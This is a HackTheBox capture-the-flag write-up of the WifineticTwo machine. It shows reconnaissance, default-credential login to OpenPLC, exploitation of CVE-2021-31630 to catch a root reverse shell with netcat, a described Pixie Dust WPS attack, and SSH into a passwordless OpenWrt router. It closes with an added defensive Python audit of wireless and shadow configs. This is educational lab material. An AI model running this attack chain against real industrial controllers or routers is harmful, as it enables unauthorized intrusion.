WifineticTwo is a medium-difficulty machine from HackTheBox that provides the opportunity to exploit a vulnerable version of the OpenPLC server, scan a wireless network, exploit the Access Point to recover the router password, connect to it, and then pivot onto the OpenWrt Access Point.
```
PS C:\Users\0xkujen> nmap -A -Pn 10.129.75.3
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-27 11:58 W. Central Africa Standard Time
NSOCK ERROR [0.2470s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.129.75.3
Host is up (0.42s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 232
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqTTNQ.et7qGhPoRm1vSFs8pnh_t4_XhIs; Expires=Sat, 27-Jul-2024 11:05:05 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Sat, 27 Jul 2024 11:00:05 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 302 FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 219
|     location: http://0.0.0.0:8080/login
|     vary: Cookie
|     set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZqTTMA.ZUdselS7Zc1Tv-oYIMJLOe-2JJs; Expires=Sat, 27-Jul-2024 11:05:00 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Sat, 27 Jul 2024 11:00:00 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     content-type: text/html; charset=utf-8
|     allow: HEAD, OPTIONS, GET
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqTTMg.gxlsN0lxodwWIFcly8yD_bLvBgQ; Expires=Sat, 27-Jul-2024 11:05:02 GMT; HttpOnly; Path=/
|     content-length: 0
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Sat, 27 Jul 2024 11:00:02 GMT
|   RTSPRequest:
|     HTTP/1.1 400 Bad request
|     content-length: 90
|     cache-control: no-cache
|     content-type: text/html
|     connection: close
|     <html><body><h1>400 Bad request</h1>
|     Your browser sent an invalid request.
|_    </body></html>
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.129.75.3:8080/login
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<snip>
```
We can see that we have OpenSSH running on port 22, and what seems to be a Python web app on port 8080.
Web application - 10.129.75.3:8080
This is OpenPLC, an open-source Programmable Logic Controller built on easy-to-use software. I instantly went over to Google and searched for default credentials for OpenPLC:
OpenPLC default credentials
Let’s try to log in with those credentials:
OpenPLC login
And we are in!! But before I go on and check for anything interesting on the portal after logging in, I go ahead and check for any vulnerabilities or CVEs for OpenPLC.
OpenPLC CVE
CVE-2021-31630
I found this GitHub repo with a proof-of-concept for CVE-2021-31630, a command injection vulnerability in OpenPLC Webserver v3 that allows remote attackers to execute arbitrary code via the “Hardware Layer Code Box” component on the “/hardware” page of the application. Let’s clone the repo and exploit this vulnerability; it is pretty straightforward once you specify the OpenPLC default credentials:
```
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.75.3] 44484
bash: cannot set terminal process group (171): Inappropriate ioctl for device
bash: no job control in this shell
root@attica02:/opt/PLC/OpenPLC_v3/webserver# id
id
uid=0(root) gid=0(root) groups=0(root)
root@attica02:/opt/PLC/OpenPLC_v3/webserver#
```
And we are root on this Linux machine. Usually on HackTheBox, when you are the root user directly after the first foothold, it most probably means there is another machine still to be exploited. We confirm this by going to the root directory and getting the user.txt flag:
The wlan0 interface is up and ready to be used but is not currently connected to a Wi-Fi network. To activate and connect this interface, you would typically use a network management tool like NetworkManager, wpa_supplicant, or nmcli to connect to a Wi-Fi network, which would then assign an IP address and allow traffic to flow through the interface.
So our objective now is to connect ourselves to the Wi-Fi network, but for that we’ll need the Access Point’s password; we already have its name, `plcrouter`.
After a lot of thought on this, I tried performing the Pixie Dust attack - in order to acquire the Wi-Fi password - which works by bruteforcing the key for a protocol called WPS. WPS was intended to make accessing a router easier, and it did - for attackers. (lol) You can read more about it here.
So now we are connected to the Wi-Fi and have a proper IP address. It is safe to assume that the router’s IP address is 192.168.1.1.
Let’s check for available machines locally first:
```
root@attica02:/opt/PLC/OpenPLC_v3/webserver# for ip in 192.168.1.{1..10}; do ping -c 1 -t 1 $ip > /dev/null && echo "${ip} is up"; done
192.168.1.1 is up
```
And yes, 192.168.1.1 is up. Let’s upload a statically compiled nmap binary and check it out:
```
root@attica02:~# ./nmap 192.168.1.1
./nmap 192.168.1.1
Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-27 17:02 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Nmap scan report for 192.168.1.1
Host is up (0.000024s latency).
Not shown: 1152 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https
MAC Address: 02:00:00:00:01:00 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds
root@attica02:~#
```
Judging from LuCI (the Lua Configuration Interface), I can tell that this is an OpenWrt router; we can confirm this with a simple Google search:
OpenWRT router
I am a bit familiar with it, so I’ll try to just SSH into the router and see what happens:
```
root@attica02:~# ssh -o StrictHostKeyChecking=no root@192.168.1.1
ssh -o StrictHostKeyChecking=no root@192.168.1.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__| |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
id
uid=0(root) gid=0(root)
```
Luckily, it appears that the root user doesn’t have a password set on the router, and we get our root flag:
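Both weaknesses that made the pivot possible (WPS left enabled on the `plcrouter` AP, and a root account with no password, which the OpenWrt banner itself warns about) are visible in the router's own configuration files. The audit below is an added example, not code from the writeup or from the OpenWrt project: it parses a constructed `/etc/config/wireless` in UCI syntax and constructed `/etc/shadow` lines (`wps_pushbutton` and `wps_label` are real OpenWrt options; the key and hash values are placeholders) and reports what a defender should fix.

```python
import re

# Constructed sample of an OpenWrt /etc/config/wireless (UCI syntax), not the
# machine's real config: an AP named plcrouter with WPS push-button enabled.
SAMPLE_WIRELESS = """config wifi-iface 'default_radio0'
    option device 'radio0'
    option mode 'ap'
    option ssid 'plcrouter'
    option encryption 'psk2'
    option key 'not-a-real-key'
    option wps_pushbutton '1'
"""
# Constructed /etc/shadow lines: root's hash field is empty, the condition the
# OpenWrt login banner warns about; the second hash is a placeholder.
SAMPLE_SHADOW = """root::0:0:99999:7:::
ops:$6$placeholder$notarealhash:19000:0:99999:7:::
"""

def parse_uci_sections(text):
    """Parse UCI "config <type> '<name>'" blocks into dicts of their options."""
    sections, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^config\s+(\S+)(?:\s+'([^']*)')?$", line)
        if m:
            current = {"type": m.group(1), "name": m.group(2) or ""}
            sections.append(current)
            continue
        m = re.match(r"^option\s+(\S+)\s+'([^']*)'$", line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return sections

def audit_wireless(text):
    """Flag AP interfaces that expose WPS (the surface Pixie Dust targets)."""
    findings = []
    for s in parse_uci_sections(text):
        if s["type"] != "wifi-iface" or s.get("mode") != "ap":
            continue
        ssid = s.get("ssid", "?")
        if s.get("wps_pushbutton") == "1" or s.get("wps_label") == "1":
            findings.append(f"{ssid}: WPS enabled; set wps_pushbutton/wps_label to 0")
    return findings

def audit_shadow(text):
    """Return account names whose shadow hash field is empty (no password)."""
    return [line.split(":")[0] for line in text.splitlines()
            if ":" in line and line.split(":")[1] == ""]
```

On a real device, feed `audit_wireless` the contents of `/etc/config/wireless` and `audit_shadow` the contents of `/etc/shadow`; a non-empty result from either is the condition this box was rooted through.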